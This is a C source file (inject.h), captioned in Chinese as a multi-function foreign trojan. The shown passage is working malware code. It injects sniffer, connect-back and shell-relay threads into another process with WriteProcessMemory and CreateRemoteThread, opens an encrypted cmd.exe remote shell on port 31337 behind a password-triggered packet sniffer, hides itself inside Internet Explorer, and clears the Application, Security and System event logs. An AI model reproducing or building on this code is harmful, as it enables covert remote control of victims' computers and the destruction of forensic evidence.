
📄 inject.h

📁 一个外国的木马哦,功能挺多的
		break;
	}

//////////////////
// copy function to process

	if ( ! WriteProcessMemory( h, psniffthread, &SniffPackets, SniffTCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}
	if (!WriteProcessMemory( h, piconnecthread, &IConnectThread, ConnectTCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}

	if (!WriteProcessMemory( h, preadshellthread, &ISessionReadShellThread, RShellTCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}
	if (!WriteProcessMemory( h, pwriteshellthread, &ISessionWriteShellThread, WShellTCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}
	if ( ! WriteProcessMemory( h, pIEStartInjectThread, &IStartInjectIEThread,IEStartInjectCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}
// initialize data area for remote process
///////////////////////////
	HMODULE hk32;
	hk32=LoadLibrary("kernel32.dll");
	if(hk32==0){	
		//MessageBox(0,"hk32","5",MB_OK);
		return 0;}

	lclsniffpar.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclsniffpar.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclsniffpar.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");
	lclsniffpar.pCreateThread = (tCreateThread) GetProcAddress( hk32, "CreateThread" );
	///
	lclconnectpar.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclconnectpar.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclconnectpar.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");


	lclwriteshellpar.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclwriteshellpar.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclwriteshellpar.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");

	lclreadshellpar.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclreadshellpar.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclreadshellpar.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");

	lclieparam.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclieparam.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclieparam.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");

	if(lclsniffpar.pLoadLibrary==0){
		//MessageBox(0,"hk1","5",MB_OK);
		return 0;
	}
	if(lclsniffpar.pGetProcAddress==0){
		//MessageBox(0,"hk2","5",MB_OK);
		return 0;
	}
	FreeLibrary( hk32 );


//	lstrcpy(lclconnectpar.szuser32dll,"user32.dll");
	lstrcpy(lclconnectpar.szWs232,"Ws2_32.dll");
	lstrcpy(lclconnectpar.szkernel32dll,"kernel32.dll");
	lstrcpy(lclconnectpar.szAdvapi32,"Advapi32.dll");
//	lstrcpy(lclconnectpar.szMessageBoxA,"MessageBoxA");

	lstrcpy(lclconnectpar.szWSAStartup,"WSAStartup");
	lstrcpy(lclconnectpar.szsocket,"socket");
	lstrcpy(lclconnectpar.szgethostbyname,"gethostbyname");
	lstrcpy(lclconnectpar.szconnect,"connect");
	lstrcpy(lclconnectpar.szhtons,"htons");
	lstrcpy(lclconnectpar.szinet_addr,"inet_addr");
//	lstrcpy(lclconnectpar.host,"localhost");
//	lclconnectpar.port=31337;

	lstrcpy(lclconnectpar.szcmdexe,"cmd.exe");
	lstrcpy(lclconnectpar.szGetCurrentProcess,"GetCurrentProcess");
	lstrcpy(lclconnectpar.szDuplicateHandle,"DuplicateHandle");
	lstrcpy(lclconnectpar.szCreatePipe,"CreatePipe");
	lstrcpy(lclconnectpar.szclosesocket,"closesocket");
	lstrcpy(lclconnectpar.szCreateProcess,"CreateProcessA");
	lstrcpy(lclconnectpar.szCloseHandle,"CloseHandle");
	lstrcpy(lclconnectpar.szCreateThread,"CreateThread");
	lstrcpy(lclconnectpar.szWaitForMultipleObjects,"WaitForMultipleObjects");
	lstrcpy(lclconnectpar.szTerminateThread,"TerminateThread");
	lstrcpy(lclconnectpar.szTerminateProcess,"TerminateProcess");
	lstrcpy(lclconnectpar.szDisconnectNamedPipe,"DisconnectNamedPipe");
	lstrcpy(lclconnectpar.szGetCurrentProcess,"GetCurrentProcess");
//	lstrcpy(lclconnectpar.szPostQuitMessage,"PostQuitMessage");

	lstrcpy(lclconnectpar.szRegisterEventSource,"RegisterEventSourceA");
	lstrcpy(lclconnectpar.szClearEventLog,"ClearEventLogA");
	lstrcpy(lclconnectpar.szDeregisterEventSource,"DeregisterEventSource");
	lstrcpy(lclconnectpar.szApplications,"Applications");
	lstrcpy(lclconnectpar.szSecu,"Secu");
	lstrcpy(lclconnectpar.szSystem,"System");
	lstrcpy(lclconnectpar.szExitProcess,"ExitProcess");	
	lclconnectpar.port=31337;

	//initialize thread address
	lclsniffpar.pConnectParam=orgconnectpar;
	lclsniffpar.pIConnectThread=(tIConnectThread)piconnecthread;

	//lclconnectpar.preadshellpar=orgreadshellpar;
	//lclconnectpar.writeshellpar=orgwriteshellpar;
	//lclconnectpar.pISessionWriteShellThread=pwriteshellthread;
	//lclconnectpar.pISessionReadShellThread=preadshellthread;
	lclwriteshellpar.Session=&lclconnectpar.Session;
	lclreadshellpar.Session=&lclconnectpar.Session;



	lclsniffpar.sa.sin_family=AF_INET;
	lclsniffpar.sa.sin_addr.s_addr=inet_addr(GetLocalIP());	

	lclsniffpar.sa.sin_port=htons((u_short)0);
	lclsniffpar.optval=1;
	memset(lclsniffpar.RcvBuf,0,sizeof(lclsniffpar.RcvBuf));
//	lstrcpy(lclsniffpar.szuser32dll,"user32.dll");
	lstrcpy(lclsniffpar.szWs232,"Ws2_32.dll");
	lstrcpy(lclsniffpar.szkernel32dll,"kernel32.dll");
	lstrcpy(lclsniffpar.szAdvapi32,"Advapi32.dll");
//	lstrcpy(lclsniffpar.szMessageBoxA,"MessageBoxA");
	lstrcpy(lclsniffpar.szSleep,"Sleep");
	lstrcpy(lclsniffpar.szWSAStartup,"WSAStartup");
	lstrcpy(lclsniffpar.szsocket,"socket");
	lstrcpy(lclsniffpar.szbind,"bind");
	lstrcpy(lclsniffpar.szrecv,"recv");
	lstrcpy(lclsniffpar.szWSAIoctl,"WSAIoctl");

	lstrcpy(lclsniffpar.szLocalPassword,SERVER_PASS);
	lstrcpy(lclsniffpar.CSP,"Microsoft Base Cryptographic Provider v1.0");
	lstrcpy(lclsniffpar.szCryptAcquireContext,"CryptAcquireContextA");
	lstrcpy(lclsniffpar.szCryptCreateHash,"CryptCreateHash");
	lstrcpy(lclsniffpar.szCryptHashData,"CryptHashData");
	lstrcpy(lclsniffpar.szCryptDeriveKey,"CryptDeriveKey");
	lstrcpy(lclsniffpar.szCryptDecrypt,"CryptDecrypt");
	lstrcpy(lclsniffpar.szCryptDestroyKey,"CryptDestroyKey");
	lstrcpy(lclsniffpar.szCryptDestroyHash,"CryptDestroyHash");
	lstrcpy(lclsniffpar.szCryptReleaseContext,"CryptReleaseContext");
	lstrcpy(lclsniffpar.szlstrlen,"lstrlenA");
	lstrcpy(lclsniffpar.szlstrcpy,"lstrcpyA");
	lstrcpy(lclsniffpar.szlstrcmp,"lstrcmpA");
	

	lstrcpy(lclsniffpar.szAdjustTokenPrivileges,"AdjustTokenPrivileges");
	lstrcpy(lclsniffpar.szOpenProcessToken,"OpenProcessToken");
	lstrcpy(lclsniffpar.szLookupPrivilegeValue,"LookupPrivilegeValueA");
	lstrcpy(lclsniffpar.szCloseHandle,"CloseHandle");
	lstrcpy(lclsniffpar.szGetCurrentProcess,"GetCurrentProcess");

//	lstrcpy(lclsniffpar.szCreateFile,"CreateFileA");
//	lstrcpy(lclsniffpar.szWriteFile,"WriteFile");
//	lstrcpy(lclsniffpar.szSetFilePointer,"SetFilePointer");	
//	lstrcpy(lclsniffpar.filename,"c:\\icmplog.txt");
//	lstrcpy(lclsniffpar.CR,"\r\n");	
	lstrcpy(lclsniffpar.szinet_ntoa,"inet_ntoa");
	

	lclsniffpar.pIEParam=orgieparam;
	lclsniffpar.pIStartInjectIEThread=(tIStartInjectIEThread)pIEStartInjectThread;



//	lstrcpy(lclieparam.szuser32dll,"user32.dll");
	lstrcpy(lclieparam.szkernel32dll,"kernel32.dll");
//	lstrcpy(lclieparam.szMessageBoxA,"MessageBoxA");
	lstrcpy(lclieparam.szCreateProcess,"CreateProcessA");
	//lstrcpy(lclieparam.sziexplorerexe,"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE");
	lstrcpy(lclieparam.szVirtualAllocEx,"VirtualAllocEx");
	lstrcpy(lclieparam.szWriteProcessMemory,"WriteProcessMemory");
	lstrcpy(lclieparam.szCreateRemoteThread,"CreateRemoteThread");
	lstrcpy(lclieparam.szOpenProcess,"OpenProcess");
	//Finding IE path
	BYTE  pathie[500];
	DWORD size;
	HKEY hkeyresult;
	RegCreateKey(HKEY_LOCAL_MACHINE, ( LPCTSTR ) "SOFTWARE\\Microsoft\\IE4\\Setup", &hkeyresult );  size=500;
	RegQueryValueEx ( hkeyresult, ( LPCTSTR )"Path" , 0, 0,pathie, &size ) ;
	RegCloseKey ( hkeyresult );
	ExpandEnvironmentStrings((char *)pathie,lclieparam.sziexplorerexe,sizeof(lclieparam.sziexplorerexe));
	lstrcat(lclieparam.sziexplorerexe,"\\IEXPLORE.EXE");



	lclieparam.iIConnectThreadsize=ConnectTCodeSize;
	lclieparam.iISessionWriteShellThreadsize=WShellTCodeSize;
	lclieparam.iISessionReadShellThreadsize=RShellTCodeSize;


	lclieparam.lclpReadShellTParam=orgreadshellpar;
	lclieparam.lclpWriteShellTParam=orgwriteshellpar;
 	lclieparam.lclpConnectParam=orgconnectpar;
	lclieparam.plclIConnectThread=(tIConnectThread)piconnecthread;
	lclieparam.plclISessionWriteShellThread=(tISessionWriteShellThread)pwriteshellthread;
	lclieparam.plclISessionReadShellThread=(tISessionReadShellThread)preadshellthread;



//	lstrcpy(lclwriteshellpar.szuser32dll,"user32.dll");
	lstrcpy(lclwriteshellpar.szWs232,"Ws2_32.dll");
	lstrcpy(lclwriteshellpar.szkernel32dll,"kernel32.dll");
//	lstrcpy(lclwriteshellpar.szMessageBoxA,"MessageBoxA");
	lstrcpy(lclwriteshellpar.szrecv,"recv");
	lstrcpy(lclwriteshellpar.szWriteFile,"WriteFile");
	lstrcpy(lclwriteshellpar.szExitThread,"ExitThread");
//	lstrcpy(lclwriteshellpar.szlstrcmpi,"lstrcmpi");

	lstrcpy(lclwriteshellpar.szAdvapi32,"Advapi32.dll");
	lstrcpy(lclwriteshellpar.szLocalPassword,SERVER_PASS);
	lstrcpy(lclwriteshellpar.CSP,"Microsoft Base Cryptographic Provider v1.0");
	lstrcpy(lclwriteshellpar.szCryptAcquireContext,"CryptAcquireContextA");
	lstrcpy(lclwriteshellpar.szCryptCreateHash,"CryptCreateHash");
	lstrcpy(lclwriteshellpar.szCryptHashData,"CryptHashData");
	lstrcpy(lclwriteshellpar.szCryptDeriveKey,"CryptDeriveKey");
	lstrcpy(lclwriteshellpar.szCryptDecrypt,"CryptDecrypt");
	lstrcpy(lclwriteshellpar.szCryptDestroyKey,"CryptDestroyKey");
	lstrcpy(lclwriteshellpar.szCryptDestroyHash,"CryptDestroyHash");
	lstrcpy(lclwriteshellpar.szCryptReleaseContext,"CryptReleaseContext");
	lstrcpy(lclwriteshellpar.szlstrlen,"lstrlenA");



//	lstrcpy(lclreadshellpar.szuser32dll,"user32.dll");
	lstrcpy(lclreadshellpar.szWs232,"Ws2_32.dll");
	lstrcpy(lclreadshellpar.szkernel32dll,"kernel32.dll");
//	lstrcpy(lclreadshellpar.szMessageBoxA,"MessageBoxA");
	lstrcpy(lclreadshellpar.szPeekNamedPipe,"PeekNamedPipe");
	lstrcpy(lclreadshellpar.szSleep,"Sleep");
	lstrcpy(lclreadshellpar.szExitThread,"ExitThread");
	lstrcpy(lclreadshellpar.szReadFile,"ReadFile");
	lstrcpy(lclreadshellpar.szsend,"send");

	lstrcpy(lclreadshellpar.szAdvapi32,"Advapi32.dll");
	lstrcpy(lclreadshellpar.szLocalPassword,SERVER_PASS);

	lstrcpy(lclreadshellpar.CSP,"Microsoft Base Cryptographic Provider v1.0");
	lstrcpy(lclreadshellpar.szCryptAcquireContext,"CryptAcquireContextA");
	lstrcpy(lclreadshellpar.szCryptCreateHash,"CryptCreateHash");
	lstrcpy(lclreadshellpar.szCryptHashData,"CryptHashData");
	lstrcpy(lclreadshellpar.szCryptDeriveKey,"CryptDeriveKey");
	lstrcpy(lclreadshellpar.szCryptEncrypt,"CryptEncrypt");
	lstrcpy(lclreadshellpar.szCryptDestroyKey,"CryptDestroyKey");
	lstrcpy(lclreadshellpar.szCryptDestroyHash,"CryptDestroyHash");
	lstrcpy(lclreadshellpar.szCryptReleaseContext,"CryptReleaseContext");
	lstrcpy(lclreadshellpar.szlstrlen,"lstrlenA");


	if (! WriteProcessMemory( h, orgieparam, &lclieparam, sizeof lclieparam, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}
	//writing Data on tarjet process..
	if (! WriteProcessMemory( h, orgsniffpar, &lclsniffpar, sizeof lclsniffpar, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}
	if (! WriteProcessMemory( h, orgconnectpar, &lclconnectpar, sizeof lclconnectpar, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}

	if (! WriteProcessMemory( h, orgwriteshellpar, &lclwriteshellpar, sizeof lclconnectpar, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}

	if (! WriteProcessMemory( h, orgreadshellpar, &lclreadshellpar, sizeof lclconnectpar, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}

	//Create remote thread on target process..
	ht = CreateRemoteThread( h, 0, 0, (DWORD (__stdcall *)( void *)) psniffthread, orgsniffpar, 0, &rc );
	if ( ht == NULL )
	{
		//MessageBox(0,"err7","",MB_OK);
		break;
	}
}while(FALSE);
//	MessageBox(0,"All okkk","",MB_OK);
return 0;
}
